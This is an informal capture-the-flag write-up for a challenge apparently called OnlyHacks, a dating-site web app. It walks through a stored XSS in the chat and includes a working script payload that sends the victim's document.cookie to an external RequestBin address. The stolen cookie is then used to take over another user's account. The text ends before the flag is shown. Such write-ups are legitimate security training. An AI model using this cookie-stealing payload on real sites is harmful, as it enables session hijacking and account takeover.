okay so on first hand i see a website with login and signup page, so i created a dumb account and login to see whats going on, then i get a match on that dating site and after that i didnt have any idea to what to do, so i had to read the official write up :
in the chat : HTML payload with <h1> tag and see how the chat behaves.
- We notice that the chat renders the HTML. Let’s try to send a simple XSS payload to steal her cookie. Because, the challenge works over the Internet, the simplest way to catch the request is to create a Request Bin and use the address of the bin on our payload. : https://requestbin.whapi.cloud/
<script>document.location="http://requestbin.whapi.cloud/1qbelmv1?inspect="+document.cookie</script>
Once we sent the payload, we refresh our bin and we notice two requests. One of the requests is because our browser also rendered the XSS payload. We inspect our cookie on the website and we
grab the cookie from the request that doesn’t match our own. We replace the cookie on our browser on the OnlyHacks tab, we refresh the page and we are logged in as Renata and we can see the flag in her DMs.
There we have flag :